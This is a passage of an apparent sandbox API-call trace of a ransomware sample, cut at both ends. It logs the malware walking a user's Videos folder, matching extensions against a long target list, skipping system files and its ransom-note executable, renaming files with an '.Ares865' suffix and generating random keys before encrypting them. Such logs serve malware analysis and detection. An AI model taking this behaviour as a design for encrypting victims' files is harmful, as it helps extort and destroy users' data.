[0092.065] lstrlenW (lpString="itw") returned 3 [0092.065] lstrcmpiW (lpString1="flv", lpString2="itw") returned -1 [0092.065] lstrlenW (lpString="jet") returned 3 [0092.065] lstrcmpiW (lpString1="flv", lpString2="jet") returned -1 [0092.065] lstrlenW (lpString="jtx") returned 3 [0092.065] lstrcmpiW (lpString1="flv", lpString2="jtx") returned -1 [0092.065] lstrlenW (lpString="kdb") returned 3 [0092.065] lstrcmpiW (lpString1="flv", lpString2="kdb") returned -1 [0092.065] lstrlenW (lpString="kexi") returned 4 [0092.065] lstrcmpiW (lpString1=".flv", lpString2="kexi") returned -1 [0092.065] lstrlenW (lpString="kexic") returned 5 [0092.065] lstrcmpiW (lpString1="H.flv", lpString2="kexic") returned -1 [0092.065] lstrlenW (lpString="kexis") returned 5 [0092.065] lstrcmpiW (lpString1="H.flv", lpString2="kexis") returned -1 [0092.065] lstrlenW (lpString="lgc") returned 3 [0092.065] lstrcmpiW (lpString1="flv", lpString2="lgc") returned -1 [0092.065] lstrlenW (lpString="lwx") returned 3 [0092.065] lstrcmpiW (lpString1="flv", lpString2="lwx") returned -1 [0092.065] lstrlenW (lpString="maf") returned 3 [0092.065] lstrcmpiW (lpString1="flv", lpString2="maf") returned -1 [0092.065] lstrlenW (lpString="maq") returned 3 [0092.065] lstrcmpiW (lpString1="flv", lpString2="maq") returned -1 [0092.065] lstrlenW (lpString="mar") returned 3 [0092.065] lstrcmpiW (lpString1="flv", lpString2="mar") returned -1 [0092.066] lstrlenW (lpString="marshal") returned 7 [0092.066] lstrcmpiW (lpString1="ngH.flv", lpString2="marshal") returned 1 [0092.066] lstrlenW (lpString="mas") returned 3 [0092.066] lstrcmpiW (lpString1="flv", lpString2="mas") returned -1 [0092.066] lstrlenW (lpString="mav") returned 3 [0092.066] lstrcmpiW (lpString1="flv", lpString2="mav") returned -1 [0092.066] lstrlenW (lpString="maw") returned 3 [0092.066] lstrcmpiW (lpString1="flv", lpString2="maw") returned -1 [0092.066] lstrlenW (lpString="mdbhtml") returned 7 [0092.066] lstrcmpiW (lpString1="ngH.flv", lpString2="mdbhtml") returned 1 [0092.066] lstrlenW (lpString="mdn") returned 3 [0092.066] lstrcmpiW (lpString1="flv", lpString2="mdn") returned -1 [0092.066] lstrlenW (lpString="mdt") returned 3 [0092.066] lstrcmpiW (lpString1="flv", lpString2="mdt") returned -1 [0092.066] lstrlenW (lpString="mfd") returned 3 [0092.066] lstrcmpiW (lpString1="flv", lpString2="mfd") returned -1 [0092.066] lstrlenW (lpString="mpd") returned 3 [0092.066] lstrcmpiW (lpString1="flv", lpString2="mpd") returned -1 [0092.066] lstrlenW (lpString="mrg") returned 3 [0092.066] lstrcmpiW (lpString1="flv", lpString2="mrg") returned -1 [0092.066] lstrlenW (lpString="mud") returned 3 [0092.066] lstrcmpiW (lpString1="flv", lpString2="mud") returned -1 [0092.066] lstrlenW (lpString="mwb") returned 3 [0092.066] lstrcmpiW (lpString1="flv", lpString2="mwb") returned -1 [0092.066] lstrlenW (lpString="myd") returned 3 [0092.066] lstrcmpiW (lpString1="flv", lpString2="myd") returned -1 [0092.066] lstrlenW (lpString="ndf") returned 3 [0092.066] lstrcmpiW (lpString1="flv", lpString2="ndf") returned -1 [0092.066] lstrlenW (lpString="nnt") returned 3 [0092.066] lstrcmpiW (lpString1="flv", lpString2="nnt") returned -1 [0092.066] lstrlenW (lpString="nrmlib") returned 6 [0092.066] lstrcmpiW (lpString1="gH.flv", lpString2="nrmlib") returned -1 [0092.066] lstrlenW (lpString="ns2") returned 3 [0092.066] lstrcmpiW (lpString1="flv", lpString2="ns2") returned -1 [0092.066] lstrlenW (lpString="ns3") returned 3 [0092.066] lstrcmpiW (lpString1="flv", lpString2="ns3") returned -1 [0092.066] lstrlenW (lpString="ns4") returned 3 [0092.066] lstrcmpiW (lpString1="flv", lpString2="ns4") returned -1 [0092.067] lstrlenW (lpString="nsf") returned 3 [0092.067] lstrcmpiW (lpString1="flv", lpString2="nsf") returned -1 [0092.067] lstrlenW (lpString="nv") returned 2 [0092.067] lstrcmpiW (lpString1="lv", lpString2="nv") returned -1 [0092.067] lstrlenW (lpString="nv2") returned 3 [0092.067] lstrcmpiW (lpString1="flv", lpString2="nv2") returned -1 [0092.067] lstrlenW (lpString="nwdb") returned 4 [0092.067] lstrcmpiW (lpString1=".flv", lpString2="nwdb") returned -1 [0092.067] lstrlenW (lpString="nyf") returned 3 [0092.067] lstrcmpiW (lpString1="flv", lpString2="nyf") returned -1 [0092.067] lstrlenW (lpString="odb") returned 3 [0092.067] lstrcmpiW (lpString1="flv", lpString2="odb") returned -1 [0092.067] lstrlenW (lpString="odb") returned 3 [0092.067] lstrcmpiW (lpString1="flv", lpString2="odb") returned -1 [0092.067] lstrlenW (lpString="oqy") returned 3 [0092.067] lstrcmpiW (lpString1="flv", lpString2="oqy") returned -1 [0092.067] lstrlenW (lpString="ora") returned 3 [0092.067] lstrcmpiW (lpString1="flv", lpString2="ora") returned -1 [0092.067] lstrlenW (lpString="orx") returned 3 [0092.067] lstrcmpiW (lpString1="flv", lpString2="orx") returned -1 [0092.067] lstrlenW (lpString="owc") returned 3 [0092.067] lstrcmpiW (lpString1="flv", lpString2="owc") returned -1 [0092.067] lstrlenW (lpString="p96") returned 3 [0092.067] lstrcmpiW (lpString1="flv", lpString2="p96") returned -1 [0092.067] lstrlenW (lpString="p97") returned 3 [0092.067] lstrcmpiW (lpString1="flv", lpString2="p97") returned -1 [0092.067] lstrlenW (lpString="pan") returned 3 [0092.067] lstrcmpiW (lpString1="flv", lpString2="pan") returned -1 [0092.067] lstrlenW (lpString="pdb") returned 3 [0092.067] lstrcmpiW (lpString1="flv", lpString2="pdb") returned -1 [0092.067] lstrlenW (lpString="pdm") returned 3 [0092.067] lstrcmpiW (lpString1="flv", lpString2="pdm") returned -1 [0092.067] lstrlenW (lpString="pnz") returned 3 [0092.067] lstrcmpiW (lpString1="flv", lpString2="pnz") returned -1 [0092.067] lstrlenW (lpString="qry") returned 3 [0092.067] lstrcmpiW (lpString1="flv", lpString2="qry") returned -1 [0092.067] lstrlenW (lpString="qvd") returned 3 [0092.067] lstrcmpiW (lpString1="flv", lpString2="qvd") returned -1 [0092.067] lstrlenW (lpString="rbf") returned 3 [0092.068] lstrcmpiW (lpString1="flv", lpString2="rbf") returned -1 [0092.068] lstrlenW (lpString="rctd") returned 4 [0092.068] lstrcmpiW (lpString1=".flv", lpString2="rctd") returned -1 [0092.068] lstrlenW (lpString="rod") returned 3 [0092.068] lstrcmpiW (lpString1="flv", lpString2="rod") returned -1 [0092.068] lstrlenW (lpString="rodx") returned 4 [0092.068] lstrcmpiW (lpString1=".flv", lpString2="rodx") returned -1 [0092.068] lstrlenW (lpString="rpd") returned 3 [0092.068] lstrcmpiW (lpString1="flv", lpString2="rpd") returned -1 [0092.068] lstrlenW (lpString="rsd") returned 3 [0092.068] lstrcmpiW (lpString1="flv", lpString2="rsd") returned -1 [0092.068] lstrlenW (lpString="sas7bdat") returned 8 [0092.068] lstrcmpiW (lpString1="ongH.flv", lpString2="sas7bdat") returned -1 [0092.068] lstrlenW (lpString="sbf") returned 3 [0092.068] lstrcmpiW (lpString1="flv", lpString2="sbf") returned -1 [0092.068] lstrlenW (lpString="scx") returned 3 [0092.068] lstrcmpiW (lpString1="flv", lpString2="scx") returned -1 [0092.068] lstrlenW (lpString="sdb") returned 3 [0092.068] lstrcmpiW (lpString1="flv", lpString2="sdb") returned -1 [0092.068] lstrlenW (lpString="sdc") returned 3 [0092.068] lstrcmpiW (lpString1="flv", lpString2="sdc") returned -1 [0092.068] lstrlenW (lpString="sdf") returned 3 [0092.068] lstrcmpiW (lpString1="flv", lpString2="sdf") returned -1 [0092.068] lstrlenW (lpString="sis") returned 3 [0092.068] lstrcmpiW (lpString1="flv", lpString2="sis") returned -1 [0092.068] lstrlenW (lpString="spq") returned 3 [0092.068] lstrcmpiW (lpString1="flv", lpString2="spq") returned -1 [0092.068] lstrlenW (lpString="te") returned 2 [0092.068] lstrcmpiW (lpString1="lv", lpString2="te") returned -1 [0092.068] lstrlenW (lpString="teacher") returned 7 [0092.068] lstrcmpiW (lpString1="ngH.flv", lpString2="teacher") returned -1 [0092.068] lstrlenW (lpString="tmd") returned 3 [0092.068] lstrcmpiW (lpString1="flv", lpString2="tmd") returned -1 [0092.068] lstrlenW (lpString="tps") returned 3 [0092.068] lstrcmpiW (lpString1="flv", lpString2="tps") returned -1 [0092.068] lstrlenW (lpString="trc") returned 3 [0092.068] lstrcmpiW (lpString1="flv", lpString2="trc") returned -1 [0092.068] lstrlenW (lpString="trc") returned 3 [0092.069] lstrcmpiW (lpString1="flv", lpString2="trc") returned -1 [0092.069] lstrlenW (lpString="trm") returned 3 [0092.069] lstrcmpiW (lpString1="flv", lpString2="trm") returned -1 [0092.069] lstrlenW (lpString="udb") returned 3 [0092.069] lstrcmpiW (lpString1="flv", lpString2="udb") returned -1 [0092.069] lstrlenW (lpString="udl") returned 3 [0092.069] lstrcmpiW (lpString1="flv", lpString2="udl") returned -1 [0092.069] lstrlenW (lpString="usr") returned 3 [0092.069] lstrcmpiW (lpString1="flv", lpString2="usr") returned -1 [0092.069] lstrlenW (lpString="v12") returned 3 [0092.069] lstrcmpiW (lpString1="flv", lpString2="v12") returned -1 [0092.069] lstrlenW (lpString="vis") returned 3 [0092.069] lstrcmpiW (lpString1="flv", lpString2="vis") returned -1 [0092.069] lstrlenW (lpString="vpd") returned 3 [0092.069] lstrcmpiW (lpString1="flv", lpString2="vpd") returned -1 [0092.069] lstrlenW (lpString="vvv") returned 3 [0092.069] lstrcmpiW (lpString1="flv", lpString2="vvv") returned -1 [0092.069] lstrlenW (lpString="wdb") returned 3 [0092.069] lstrcmpiW (lpString1="flv", lpString2="wdb") returned -1 [0092.069] lstrlenW (lpString="wmdb") returned 4 [0092.069] lstrcmpiW (lpString1=".flv", lpString2="wmdb") returned -1 [0092.069] lstrlenW (lpString="wrk") returned 3 [0092.069] lstrcmpiW (lpString1="flv", lpString2="wrk") returned -1 [0092.069] lstrlenW (lpString="xdb") returned 3 [0092.069] lstrcmpiW (lpString1="flv", lpString2="xdb") returned -1 [0092.069] lstrlenW (lpString="xld") returned 3 [0092.069] lstrcmpiW (lpString1="flv", lpString2="xld") returned -1 [0092.069] lstrlenW (lpString="xmlff") returned 5 [0092.069] lstrcmpiW (lpString1="H.flv", lpString2="xmlff") returned -1 [0092.069] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6\\IUIaXsECWBnwr_3ongH.flv.Ares865") returned 110 [0092.069] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6\\IUIaXsECWBnwr_3ongH.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\1vakhotsrmaqah6\\iuiaxsecwbnwr_3ongh.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6\\IUIaXsECWBnwr_3ongH.flv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\1vakhotsrmaqah6\\iuiaxsecwbnwr_3ongh.flv.ares865"), dwFlags=0x1) returned 1 [0092.070] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6\\IUIaXsECWBnwr_3ongH.flv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\1vakhotsrmaqah6\\iuiaxsecwbnwr_3ongh.flv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.070] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=70988) returned 1 [0092.070] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.070] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.070] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.071] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.071] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.071] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.071] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11850, lpName=0x0) returned 0x15c [0092.071] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11850) returned 0x190000 [0092.074] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.075] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.075] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.075] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.075] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.075] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.075] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.075] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.075] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.075] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0092.075] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.075] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0092.075] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.075] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.076] CloseHandle (hObject=0x15c) returned 1 [0092.076] CloseHandle (hObject=0x118) returned 1 [0092.077] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.077] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.077] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.077] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aa3cdc0, ftCreationTime.dwHighDateTime=0x1d4cfba, ftLastAccessTime.dwLowDateTime=0x2d448680, ftLastAccessTime.dwHighDateTime=0x1d4cccb, ftLastWriteTime.dwLowDateTime=0x2d448680, ftLastWriteTime.dwHighDateTime=0x1d4cccb, nFileSizeHigh=0x0, nFileSizeLow=0x17dd3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pkjInOLBW7.mkv", cAlternateFileName="PKJINO~1.MKV")) returned 1 [0092.077] lstrcmpiW (lpString1="pkjInOLBW7.mkv", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0092.077] lstrcmpiW (lpString1="pkjInOLBW7.mkv", lpString2="aoldtz.exe") returned 1 [0092.077] lstrcmpiW (lpString1="pkjInOLBW7.mkv", lpString2=".") returned 1 [0092.077] lstrcmpiW (lpString1="pkjInOLBW7.mkv", lpString2="..") returned 1 [0092.077] lstrcmpiW (lpString1="pkjInOLBW7.mkv", lpString2="windows") returned -1 [0092.078] lstrcmpiW (lpString1="pkjInOLBW7.mkv", lpString2="bootmgr") returned 1 [0092.078] lstrcmpiW (lpString1="pkjInOLBW7.mkv", lpString2="temp") returned -1 [0092.078] lstrcmpiW (lpString1="pkjInOLBW7.mkv", lpString2="pagefile.sys") returned 1 [0092.078] lstrcmpiW (lpString1="pkjInOLBW7.mkv", lpString2="boot") returned 1 [0092.078] lstrcmpiW (lpString1="pkjInOLBW7.mkv", lpString2="ids.txt") returned 1 [0092.078] lstrcmpiW (lpString1="pkjInOLBW7.mkv", lpString2="ntuser.dat") returned 1 [0092.078] lstrcmpiW (lpString1="pkjInOLBW7.mkv", lpString2="perflogs") returned 1 [0092.078] lstrcmpiW (lpString1="pkjInOLBW7.mkv", lpString2="MSBuild") returned 1 [0092.078] lstrlenW (lpString="pkjInOLBW7.mkv") returned 14 [0092.078] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6\\IUIaXsECWBnwr_3ongH.flv") returned 102 [0092.078] lstrcpyW (in: lpString1=0x2cce49e, lpString2="pkjInOLBW7.mkv" | out: lpString1="pkjInOLBW7.mkv") returned="pkjInOLBW7.mkv" [0092.078] lstrlenW (lpString="pkjInOLBW7.mkv") returned 14 [0092.078] lstrlenW (lpString="Ares865") returned 7 [0092.078] lstrcmpiW (lpString1="BW7.mkv", lpString2="Ares865") returned 1 [0092.078] lstrlenW (lpString=".dll") returned 4 [0092.078] lstrcmpiW (lpString1="pkjInOLBW7.mkv", lpString2=".dll") returned 1 [0092.078] lstrlenW (lpString=".lnk") returned 4 [0092.078] lstrcmpiW (lpString1="pkjInOLBW7.mkv", lpString2=".lnk") returned 1 [0092.078] lstrlenW (lpString=".ini") returned 4 [0092.078] lstrcmpiW (lpString1="pkjInOLBW7.mkv", lpString2=".ini") returned 1 [0092.078] lstrlenW (lpString=".sys") returned 4 [0092.078] lstrcmpiW (lpString1="pkjInOLBW7.mkv", lpString2=".sys") returned 1 [0092.078] lstrlenW (lpString="pkjInOLBW7.mkv") returned 14 [0092.078] lstrlenW (lpString="bak") returned 3 [0092.078] lstrcmpiW (lpString1="mkv", lpString2="bak") returned 1 [0092.078] lstrlenW (lpString="ba_") returned 3 [0092.078] lstrcmpiW (lpString1="mkv", lpString2="ba_") returned 1 [0092.078] lstrlenW (lpString="dbb") returned 3 [0092.078] lstrcmpiW (lpString1="mkv", lpString2="dbb") returned 1 [0092.078] lstrlenW (lpString="vmdk") returned 4 [0092.078] lstrcmpiW (lpString1=".mkv", lpString2="vmdk") returned -1 [0092.078] lstrlenW (lpString="rar") returned 3 [0092.078] lstrcmpiW (lpString1="mkv", lpString2="rar") returned -1 [0092.078] lstrlenW (lpString="zip") returned 3 [0092.078] lstrcmpiW (lpString1="mkv", lpString2="zip") returned -1 [0092.078] lstrlenW (lpString="tgz") returned 3 [0092.078] lstrcmpiW (lpString1="mkv", lpString2="tgz") returned -1 [0092.079] lstrlenW (lpString="vbox") returned 4 [0092.079] lstrcmpiW (lpString1=".mkv", lpString2="vbox") returned -1 [0092.079] lstrlenW (lpString="vdi") returned 3 [0092.079] lstrcmpiW (lpString1="mkv", lpString2="vdi") returned -1 [0092.079] lstrlenW (lpString="vhd") returned 3 [0092.079] lstrcmpiW (lpString1="mkv", lpString2="vhd") returned -1 [0092.079] lstrlenW (lpString="vhdx") returned 4 [0092.079] lstrcmpiW (lpString1=".mkv", lpString2="vhdx") returned -1 [0092.079] lstrlenW (lpString="avhd") returned 4 [0092.079] lstrcmpiW (lpString1=".mkv", lpString2="avhd") returned -1 [0092.079] lstrlenW (lpString="db") returned 2 [0092.079] lstrcmpiW (lpString1="kv", lpString2="db") returned 1 [0092.079] lstrlenW (lpString="db2") returned 3 [0092.079] lstrcmpiW (lpString1="mkv", lpString2="db2") returned 1 [0092.079] lstrlenW (lpString="db3") returned 3 [0092.079] lstrcmpiW (lpString1="mkv", lpString2="db3") returned 1 [0092.079] lstrlenW (lpString="dbf") returned 3 [0092.079] lstrcmpiW (lpString1="mkv", lpString2="dbf") returned 1 [0092.079] lstrlenW (lpString="mdf") returned 3 [0092.079] lstrcmpiW (lpString1="mkv", lpString2="mdf") returned 1 [0092.079] lstrlenW (lpString="mdb") returned 3 [0092.079] lstrcmpiW (lpString1="mkv", lpString2="mdb") returned 1 [0092.079] lstrlenW (lpString="sql") returned 3 [0092.079] lstrcmpiW (lpString1="mkv", lpString2="sql") returned -1 [0092.079] lstrlenW (lpString="sqlite") returned 6 [0092.079] lstrcmpiW (lpString1="W7.mkv", lpString2="sqlite") returned 1 [0092.079] lstrlenW (lpString="sqlite3") returned 7 [0092.079] lstrcmpiW (lpString1="BW7.mkv", lpString2="sqlite3") returned -1 [0092.079] lstrlenW (lpString="sqlitedb") returned 8 [0092.079] lstrcmpiW (lpString1="LBW7.mkv", lpString2="sqlitedb") returned -1 [0092.079] lstrlenW (lpString="xml") returned 3 [0092.079] lstrcmpiW (lpString1="mkv", lpString2="xml") returned -1 [0092.079] lstrlenW (lpString="$er") returned 3 [0092.079] lstrcmpiW (lpString1="mkv", lpString2="$er") returned 1 [0092.079] lstrlenW (lpString="4dd") returned 3 [0092.079] lstrcmpiW (lpString1="mkv", lpString2="4dd") returned 1 [0092.079] lstrlenW (lpString="4dl") returned 3 [0092.079] lstrcmpiW (lpString1="mkv", lpString2="4dl") returned 1 [0092.079] lstrlenW (lpString="^^^") returned 3 [0092.080] lstrcmpiW (lpString1="mkv", lpString2="^^^") returned 1 [0092.080] lstrlenW (lpString="abs") returned 3 [0092.080] lstrcmpiW (lpString1="mkv", lpString2="abs") returned 1 [0092.080] lstrlenW (lpString="abx") returned 3 [0092.080] lstrcmpiW (lpString1="mkv", lpString2="abx") returned 1 [0092.080] lstrlenW (lpString="accdb") returned 5 [0092.080] lstrcmpiW (lpString1="7.mkv", lpString2="accdb") returned -1 [0092.080] lstrlenW (lpString="accdc") returned 5 [0092.080] lstrcmpiW (lpString1="7.mkv", lpString2="accdc") returned -1 [0092.080] lstrlenW (lpString="accde") returned 5 [0092.080] lstrcmpiW (lpString1="7.mkv", lpString2="accde") returned -1 [0092.080] lstrlenW (lpString="accdr") returned 5 [0092.080] lstrcmpiW (lpString1="7.mkv", lpString2="accdr") returned -1 [0092.080] lstrlenW (lpString="accdt") returned 5 [0092.080] lstrcmpiW (lpString1="7.mkv", lpString2="accdt") returned -1 [0092.080] lstrlenW (lpString="accdw") returned 5 [0092.080] lstrcmpiW (lpString1="7.mkv", lpString2="accdw") returned -1 [0092.080] lstrlenW (lpString="accft") returned 5 [0092.080] lstrcmpiW (lpString1="7.mkv", lpString2="accft") returned -1 [0092.080] lstrlenW (lpString="adb") returned 3 [0092.080] lstrcmpiW (lpString1="mkv", lpString2="adb") returned 1 [0092.080] lstrlenW (lpString="adb") returned 3 [0092.080] lstrcmpiW (lpString1="mkv", lpString2="adb") returned 1 [0092.080] lstrlenW (lpString="ade") returned 3 [0092.080] lstrcmpiW (lpString1="mkv", lpString2="ade") returned 1 [0092.080] lstrlenW (lpString="adf") returned 3 [0092.080] lstrcmpiW (lpString1="mkv", lpString2="adf") returned 1 [0092.080] lstrlenW (lpString="adn") returned 3 [0092.080] lstrcmpiW (lpString1="mkv", lpString2="adn") returned 1 [0092.080] lstrlenW (lpString="adp") returned 3 [0092.080] lstrcmpiW (lpString1="mkv", lpString2="adp") returned 1 [0092.080] lstrlenW (lpString="alf") returned 3 [0092.080] lstrcmpiW (lpString1="mkv", lpString2="alf") returned 1 [0092.080] lstrlenW (lpString="ask") returned 3 [0092.080] lstrcmpiW (lpString1="mkv", lpString2="ask") returned 1 [0092.080] lstrlenW (lpString="btr") returned 3 [0092.080] lstrcmpiW (lpString1="mkv", lpString2="btr") returned 1 [0092.080] lstrlenW (lpString="cat") returned 3 [0092.080] lstrcmpiW (lpString1="mkv", lpString2="cat") returned 1 [0092.081] lstrlenW (lpString="cdb") returned 3 [0092.081] lstrcmpiW (lpString1="mkv", lpString2="cdb") returned 1 [0092.081] lstrlenW (lpString="ckp") returned 3 [0092.081] lstrcmpiW (lpString1="mkv", lpString2="ckp") returned 1 [0092.081] lstrlenW (lpString="cma") returned 3 [0092.081] lstrcmpiW (lpString1="mkv", lpString2="cma") returned 1 [0092.081] lstrlenW (lpString="cpd") returned 3 [0092.081] lstrcmpiW (lpString1="mkv", lpString2="cpd") returned 1 [0092.081] lstrlenW (lpString="dacpac") returned 6 [0092.081] lstrcmpiW (lpString1="W7.mkv", lpString2="dacpac") returned 1 [0092.081] lstrlenW (lpString="dad") returned 3 [0092.081] lstrcmpiW (lpString1="mkv", lpString2="dad") returned 1 [0092.081] lstrlenW (lpString="dadiagrams") returned 10 [0092.081] lstrcmpiW (lpString1="nOLBW7.mkv", lpString2="dadiagrams") returned 1 [0092.081] lstrlenW (lpString="daschema") returned 8 [0092.081] lstrcmpiW (lpString1="LBW7.mkv", lpString2="daschema") returned 1 [0092.081] lstrlenW (lpString="db-journal") returned 10 [0092.081] lstrcmpiW (lpString1="nOLBW7.mkv", lpString2="db-journal") returned 1 [0092.081] lstrlenW (lpString="db-shm") returned 6 [0092.081] lstrcmpiW (lpString1="W7.mkv", lpString2="db-shm") returned 1 [0092.081] lstrlenW (lpString="db-wal") returned 6 [0092.081] lstrcmpiW (lpString1="W7.mkv", lpString2="db-wal") returned 1 [0092.081] lstrlenW (lpString="dbc") returned 3 [0092.081] lstrcmpiW (lpString1="mkv", lpString2="dbc") returned 1 [0092.081] lstrlenW (lpString="dbs") returned 3 [0092.081] lstrcmpiW (lpString1="mkv", lpString2="dbs") returned 1 [0092.081] lstrlenW (lpString="dbt") returned 3 [0092.081] lstrcmpiW (lpString1="mkv", lpString2="dbt") returned 1 [0092.081] lstrlenW (lpString="dbv") returned 3 [0092.081] lstrcmpiW (lpString1="mkv", lpString2="dbv") returned 1 [0092.081] lstrlenW (lpString="dbx") returned 3 [0092.081] lstrcmpiW (lpString1="mkv", lpString2="dbx") returned 1 [0092.081] lstrlenW (lpString="dcb") returned 3 [0092.081] lstrcmpiW (lpString1="mkv", lpString2="dcb") returned 1 [0092.081] lstrlenW (lpString="dct") returned 3 [0092.082] lstrcmpiW (lpString1="mkv", lpString2="dct") returned 1 [0092.082] lstrlenW (lpString="dcx") returned 3 [0092.082] lstrcmpiW (lpString1="mkv", lpString2="dcx") returned 1 [0092.082] lstrlenW (lpString="ddl") returned 3 [0092.082] lstrcmpiW (lpString1="mkv", lpString2="ddl") returned 1 [0092.082] lstrlenW (lpString="dlis") returned 4 [0092.082] lstrcmpiW (lpString1=".mkv", lpString2="dlis") returned -1 [0092.082] lstrlenW (lpString="dp1") returned 3 [0092.082] lstrcmpiW (lpString1="mkv", lpString2="dp1") returned 1 [0092.082] lstrlenW (lpString="dqy") returned 3 [0092.082] lstrcmpiW (lpString1="mkv", lpString2="dqy") returned 1 [0092.082] lstrlenW (lpString="dsk") returned 3 [0092.082] lstrcmpiW (lpString1="mkv", lpString2="dsk") returned 1 [0092.082] lstrlenW (lpString="dsn") returned 3 [0092.082] lstrcmpiW (lpString1="mkv", lpString2="dsn") returned 1 [0092.082] lstrlenW (lpString="dtsx") returned 4 [0092.082] lstrcmpiW (lpString1=".mkv", lpString2="dtsx") returned -1 [0092.082] lstrlenW (lpString="dxl") returned 3 [0092.082] lstrcmpiW (lpString1="mkv", lpString2="dxl") returned 1 [0092.082] lstrlenW (lpString="eco") returned 3 [0092.082] lstrcmpiW (lpString1="mkv", lpString2="eco") returned 1 [0092.082] lstrlenW (lpString="ecx") returned 3 [0092.082] lstrcmpiW (lpString1="mkv", lpString2="ecx") returned 1 [0092.082] lstrlenW (lpString="edb") returned 3 [0092.082] lstrcmpiW (lpString1="mkv", lpString2="edb") returned 1 [0092.082] lstrlenW (lpString="epim") returned 4 [0092.082] lstrcmpiW (lpString1=".mkv", lpString2="epim") returned -1 [0092.082] lstrlenW (lpString="fcd") returned 3 [0092.082] lstrcmpiW (lpString1="mkv", lpString2="fcd") returned 1 [0092.082] lstrlenW (lpString="fdb") returned 3 [0092.082] lstrcmpiW (lpString1="mkv", lpString2="fdb") returned 1 [0092.082] lstrlenW (lpString="fic") returned 3 [0092.082] lstrcmpiW (lpString1="mkv", lpString2="fic") returned 1 [0092.082] lstrlenW (lpString="flexolibrary") returned 12 [0092.082] lstrcmpiW (lpString1="jInOLBW7.mkv", lpString2="flexolibrary") returned 1 [0092.082] lstrlenW (lpString="fm5") returned 3 [0092.082] lstrcmpiW (lpString1="mkv", lpString2="fm5") returned 1 [0092.082] lstrlenW (lpString="fmp") returned 3 [0092.083] lstrcmpiW (lpString1="mkv", 